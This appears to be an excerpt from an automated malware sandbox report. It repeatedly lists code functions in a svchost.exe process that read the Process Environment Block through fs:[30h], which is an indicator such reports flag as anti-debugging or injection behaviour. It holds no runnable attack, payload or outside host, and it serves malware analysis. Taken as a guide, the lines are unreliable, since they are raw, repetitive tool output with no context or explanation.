                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326E284 mov eax, dword ptr fs:[00000030h]4_2_0326E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326E284 mov eax, dword ptr fs:[00000030h]4_2_0326E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B0283 mov eax, dword ptr fs:[00000030h]4_2_032B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B0283 mov eax, dword ptr fs:[00000030h]4_2_032B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B0283 mov eax, dword ptr fs:[00000030h]4_2_032B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032402E1 mov eax, dword ptr fs:[00000030h]4_2_032402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032402E1 mov eax, dword ptr fs:[00000030h]4_2_032402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032402E1 mov eax, dword ptr fs:[00000030h]4_2_032402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323A2C3 mov eax, dword ptr fs:[00000030h]4_2_0323A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323A2C3 mov eax, dword ptr fs:[00000030h]4_2_0323A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323A2C3 mov eax, dword ptr fs:[00000030h]4_2_0323A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323A2C3 mov eax, dword ptr fs:[00000030h]4_2_0323A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323A2C3 mov eax, dword ptr fs:[00000030h]4_2_0323A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_033062D6 mov eax, dword ptr fs:[00000030h]4_2_033062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03260124 mov eax, dword ptr fs:[00000030h]4_2_03260124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DE10E mov eax, dword ptr fs:[00000030h]4_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DE10E mov ecx, dword ptr fs:[00000030h]4_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DE10E mov eax, dword ptr fs:[00000030h]4_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DE10E mov eax, dword ptr fs:[00000030h]4_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DE10E mov ecx, dword ptr fs:[00000030h]4_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DE10E mov eax, dword ptr fs:[00000030h]4_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DE10E mov eax, dword ptr fs:[00000030h]4_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DE10E mov ecx, dword ptr fs:[00000030h]4_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DE10E mov eax, dword ptr fs:[00000030h]4_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DE10E mov ecx, dword ptr fs:[00000030h]4_2_032DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DA118 mov ecx, dword ptr fs:[00000030h]4_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DA118 mov eax, dword ptr fs:[00000030h]4_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DA118 mov eax, dword ptr fs:[00000030h]4_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032DA118 mov eax, dword ptr fs:[00000030h]4_2_032DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F0115 mov eax, dword ptr fs:[00000030h]4_2_032F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03304164 mov eax, dword ptr fs:[00000030h]4_2_03304164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03304164 mov eax, dword ptr fs:[00000030h]4_2_03304164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C4144 mov eax, dword ptr fs:[00000030h]4_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C4144 mov eax, dword ptr fs:[00000030h]4_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C4144 mov ecx, dword ptr fs:[00000030h]4_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C4144 mov eax, dword ptr fs:[00000030h]4_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C4144 mov eax, dword ptr fs:[00000030h]4_2_032C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322C156 mov eax, dword ptr fs:[00000030h]4_2_0322C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C8158 mov eax, dword ptr fs:[00000030h]4_2_032C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03236154 mov eax, dword ptr fs:[00000030h]4_2_03236154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03236154 mov eax, dword ptr fs:[00000030h]4_2_03236154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03270185 mov eax, dword ptr fs:[00000030h]4_2_03270185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032EC188 mov eax, dword ptr fs:[00000030h]4_2_032EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032EC188 mov eax, dword ptr fs:[00000030h]4_2_032EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D4180 mov eax, dword ptr fs:[00000030h]4_2_032D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D4180 mov eax, dword ptr fs:[00000030h]4_2_032D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B019F mov eax, dword ptr fs:[00000030h]4_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B019F mov eax, dword ptr fs:[00000030h]4_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B019F mov eax, dword ptr fs:[00000030h]4_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B019F mov eax, dword ptr fs:[00000030h]4_2_032B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322A197 mov eax, dword ptr fs:[00000030h]4_2_0322A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322A197 mov eax, dword ptr fs:[00000030h]4_2_0322A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322A197 mov eax, dword ptr fs:[00000030h]4_2_0322A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_033061E5 mov eax, dword ptr fs:[00000030h]4_2_033061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032601F8 mov eax, dword ptr fs:[00000030h]4_2_032601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F61C3 mov eax, dword ptr fs:[00000030h]4_2_032F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F61C3 mov eax, dword ptr fs:[00000030h]4_2_032F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AE1D0 mov eax, dword ptr fs:[00000030h]4_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AE1D0 mov eax, dword ptr fs:[00000030h]4_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]4_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AE1D0 mov eax, dword ptr fs:[00000030h]4_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AE1D0 mov eax, dword ptr fs:[00000030h]4_2_032AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322A020 mov eax, dword ptr fs:[00000030h]4_2_0322A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322C020 mov eax, dword ptr fs:[00000030h]4_2_0322C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C6030 mov eax, dword ptr fs:[00000030h]4_2_032C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B4000 mov ecx, dword ptr fs:[00000030h]4_2_032B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D2000 mov eax, dword ptr fs:[00000030h]4_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D2000 mov eax, dword ptr fs:[00000030h]4_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D2000 mov eax, dword ptr fs:[00000030h]4_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D2000 mov eax, dword ptr fs:[00000030h]4_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D2000 mov eax, dword ptr fs:[00000030h]4_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D2000 mov eax, dword ptr fs:[00000030h]4_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D2000 mov eax, dword ptr fs:[00000030h]4_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D2000 mov eax, dword ptr fs:[00000030h]4_2_032D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324E016 mov eax, dword ptr fs:[00000030h]4_2_0324E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324E016 mov eax, dword ptr fs:[00000030h]4_2_0324E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324E016 mov eax, dword ptr fs:[00000030h]4_2_0324E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324E016 mov eax, dword ptr fs:[00000030h]4_2_0324E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325C073 mov eax, dword ptr fs:[00000030h]4_2_0325C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03232050 mov eax, dword ptr fs:[00000030h]4_2_03232050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B6050 mov eax, dword ptr fs:[00000030h]4_2_032B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032280A0 mov eax, dword ptr fs:[00000030h]4_2_032280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C80A8 mov eax, dword ptr fs:[00000030h]4_2_032C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F60B8 mov eax, dword ptr fs:[00000030h]4_2_032F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F60B8 mov ecx, dword ptr fs:[00000030h]4_2_032F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323208A mov eax, dword ptr fs:[00000030h]4_2_0323208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0322A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032380E9 mov eax, dword ptr fs:[00000030h]4_2_032380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B60E0 mov eax, dword ptr fs:[00000030h]4_2_032B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322C0F0 mov eax, dword ptr fs:[00000030h]4_2_0322C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032720F0 mov ecx, dword ptr fs:[00000030h]4_2_032720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B20DE mov eax, dword ptr fs:[00000030h]4_2_032B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326C720 mov eax, dword ptr fs:[00000030h]4_2_0326C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326C720 mov eax, dword ptr fs:[00000030h]4_2_0326C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326273C mov eax, dword ptr fs:[00000030h]4_2_0326273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326273C mov ecx, dword ptr fs:[00000030h]4_2_0326273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326273C mov eax, dword ptr fs:[00000030h]4_2_0326273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AC730 mov eax, dword ptr fs:[00000030h]4_2_032AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326C700 mov eax, dword ptr fs:[00000030h]4_2_0326C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03230710 mov eax, dword ptr fs:[00000030h]4_2_03230710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03260710 mov eax, dword ptr fs:[00000030h]4_2_03260710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03238770 mov eax, dword ptr fs:[00000030h]4_2_03238770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240770 mov eax, dword ptr fs:[00000030h]4_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240770 mov eax, dword ptr fs:[00000030h]4_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240770 mov eax, dword ptr fs:[00000030h]4_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240770 mov eax, dword ptr fs:[00000030h]4_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240770 mov eax, dword ptr fs:[00000030h]4_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240770 mov eax, dword ptr fs:[00000030h]4_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240770 mov eax, dword ptr fs:[00000030h]4_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240770 mov eax, dword ptr fs:[00000030h]4_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240770 mov eax, dword ptr fs:[00000030h]4_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240770 mov eax, dword ptr fs:[00000030h]4_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240770 mov eax, dword ptr fs:[00000030h]4_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240770 mov eax, dword ptr fs:[00000030h]4_2_03240770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326674D mov esi, dword ptr fs:[00000030h]4_2_0326674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326674D mov eax, dword ptr fs:[00000030h]4_2_0326674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326674D mov eax, dword ptr fs:[00000030h]4_2_0326674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03230750 mov eax, dword ptr fs:[00000030h]4_2_03230750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032BE75D mov eax, dword ptr fs:[00000030h]4_2_032BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272750 mov eax, dword ptr fs:[00000030h]4_2_03272750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272750 mov eax, dword ptr fs:[00000030h]4_2_03272750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B4755 mov eax, dword ptr fs:[00000030h]4_2_032B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032307AF mov eax, dword ptr fs:[00000030h]4_2_032307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032E47A0 mov eax, dword ptr fs:[00000030h]4_2_032E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032D678E mov eax, dword ptr fs:[00000030h]4_2_032D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032527ED mov eax, dword ptr fs:[00000030h]4_2_032527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032527ED mov eax, dword ptr fs:[00000030h]4_2_032527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032527ED mov eax, dword ptr fs:[00000030h]4_2_032527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032BE7E1 mov eax, dword ptr fs:[00000030h]4_2_032BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032347FB mov eax, dword ptr fs:[00000030h]4_2_032347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032347FB mov eax, dword ptr fs:[00000030h]4_2_032347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323C7C0 mov eax, dword ptr fs:[00000030h]4_2_0323C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B07C3 mov eax, dword ptr fs:[00000030h]4_2_032B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324E627 mov eax, dword ptr fs:[00000030h]4_2_0324E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03266620 mov eax, dword ptr fs:[00000030h]4_2_03266620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03268620 mov eax, dword ptr fs:[00000030h]4_2_03268620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0323262C mov eax, dword ptr fs:[00000030h]4_2_0323262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AE609 mov eax, dword ptr fs:[00000030h]4_2_032AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324260B mov eax, dword ptr fs:[00000030h]4_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324260B mov eax, dword ptr fs:[00000030h]4_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324260B mov eax, dword ptr fs:[00000030h]4_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324260B mov eax, dword ptr fs:[00000030h]4_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324260B mov eax, dword ptr fs:[00000030h]4_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324260B mov eax, dword ptr fs:[00000030h]4_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324260B mov eax, dword ptr fs:[00000030h]4_2_0324260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03272619 mov eax, dword ptr fs:[00000030h]4_2_03272619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F866E mov eax, dword ptr fs:[00000030h]4_2_032F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032F866E mov eax, dword ptr fs:[00000030h]4_2_032F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326A660 mov eax, dword ptr fs:[00000030h]4_2_0326A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326A660 mov eax, dword ptr fs:[00000030h]4_2_0326A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03262674 mov eax, dword ptr fs:[00000030h]4_2_03262674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0324C640 mov eax, dword ptr fs:[00000030h]4_2_0324C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326C6A6 mov eax, dword ptr fs:[00000030h]4_2_0326C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032666B0 mov eax, dword ptr fs:[00000030h]4_2_032666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03234690 mov eax, dword ptr fs:[00000030h]4_2_03234690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03234690 mov eax, dword ptr fs:[00000030h]4_2_03234690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AE6F2 mov eax, dword ptr fs:[00000030h]4_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AE6F2 mov eax, dword ptr fs:[00000030h]4_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AE6F2 mov eax, dword ptr fs:[00000030h]4_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032AE6F2 mov eax, dword ptr fs:[00000030h]4_2_032AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B06F1 mov eax, dword ptr fs:[00000030h]4_2_032B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B06F1 mov eax, dword ptr fs:[00000030h]4_2_032B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0326A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326A6C7 mov eax, dword ptr fs:[00000030h]4_2_0326A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240535 mov eax, dword ptr fs:[00000030h]4_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240535 mov eax, dword ptr fs:[00000030h]4_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240535 mov eax, dword ptr fs:[00000030h]4_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240535 mov eax, dword ptr fs:[00000030h]4_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240535 mov eax, dword ptr fs:[00000030h]4_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03240535 mov eax, dword ptr fs:[00000030h]4_2_03240535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325E53E mov eax, dword ptr fs:[00000030h]4_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325E53E mov eax, dword ptr fs:[00000030h]4_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325E53E mov eax, dword ptr fs:[00000030h]4_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325E53E mov eax, dword ptr fs:[00000030h]4_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325E53E mov eax, dword ptr fs:[00000030h]4_2_0325E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032C6500 mov eax, dword ptr fs:[00000030h]4_2_032C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03304500 mov eax, dword ptr fs:[00000030h]4_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03304500 mov eax, dword ptr fs:[00000030h]4_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03304500 mov eax, dword ptr fs:[00000030h]4_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03304500 mov eax, dword ptr fs:[00000030h]4_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03304500 mov eax, dword ptr fs:[00000030h]4_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03304500 mov eax, dword ptr fs:[00000030h]4_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03304500 mov eax, dword ptr fs:[00000030h]4_2_03304500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326656A mov eax, dword ptr fs:[00000030h]4_2_0326656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326656A mov eax, dword ptr fs:[00000030h]4_2_0326656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326656A mov eax, dword ptr fs:[00000030h]4_2_0326656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03238550 mov eax, dword ptr fs:[00000030h]4_2_03238550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03238550 mov eax, dword ptr fs:[00000030h]4_2_03238550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B05A7 mov eax, dword ptr fs:[00000030h]4_2_032B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B05A7 mov eax, dword ptr fs:[00000030h]4_2_032B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B05A7 mov eax, dword ptr fs:[00000030h]4_2_032B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032545B1 mov eax, dword ptr fs:[00000030h]4_2_032545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032545B1 mov eax, dword ptr fs:[00000030h]4_2_032545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03232582 mov eax, dword ptr fs:[00000030h]4_2_03232582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03232582 mov ecx, dword ptr fs:[00000030h]4_2_03232582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03264588 mov eax, dword ptr fs:[00000030h]4_2_03264588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326E59C mov eax, dword ptr fs:[00000030h]4_2_0326E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325E5E7 mov eax, dword ptr fs:[00000030h]4_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325E5E7 mov eax, dword ptr fs:[00000030h]4_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325E5E7 mov eax, dword ptr fs:[00000030h]4_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325E5E7 mov eax, dword ptr fs:[00000030h]4_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325E5E7 mov eax, dword ptr fs:[00000030h]4_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325E5E7 mov eax, dword ptr fs:[00000030h]4_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325E5E7 mov eax, dword ptr fs:[00000030h]4_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0325E5E7 mov eax, dword ptr fs:[00000030h]4_2_0325E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032325E0 mov eax, dword ptr fs:[00000030h]4_2_032325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326C5ED mov eax, dword ptr fs:[00000030h]4_2_0326C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326C5ED mov eax, dword ptr fs:[00000030h]4_2_0326C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326E5CF mov eax, dword ptr fs:[00000030h]4_2_0326E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326E5CF mov eax, dword ptr fs:[00000030h]4_2_0326E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032365D0 mov eax, dword ptr fs:[00000030h]4_2_032365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326A5D0 mov eax, dword ptr fs:[00000030h]4_2_0326A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326A5D0 mov eax, dword ptr fs:[00000030h]4_2_0326A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322E420 mov eax, dword ptr fs:[00000030h]4_2_0322E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322E420 mov eax, dword ptr fs:[00000030h]4_2_0322E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322E420 mov eax, dword ptr fs:[00000030h]4_2_0322E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0322C427 mov eax, dword ptr fs:[00000030h]4_2_0322C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B6420 mov eax, dword ptr fs:[00000030h]4_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B6420 mov eax, dword ptr fs:[00000030h]4_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B6420 mov eax, dword ptr fs:[00000030h]4_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B6420 mov eax, dword ptr fs:[00000030h]4_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B6420 mov eax, dword ptr fs:[00000030h]4_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B6420 mov eax, dword ptr fs:[00000030h]4_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_032B6420 mov eax, dword ptr fs:[00000030h]4_2_032B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0326A430 mov eax, dword ptr fs:[00000030h]4_2_0326A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03268402 mov eax, dword ptr fs:[00000030h]4_2_03268402
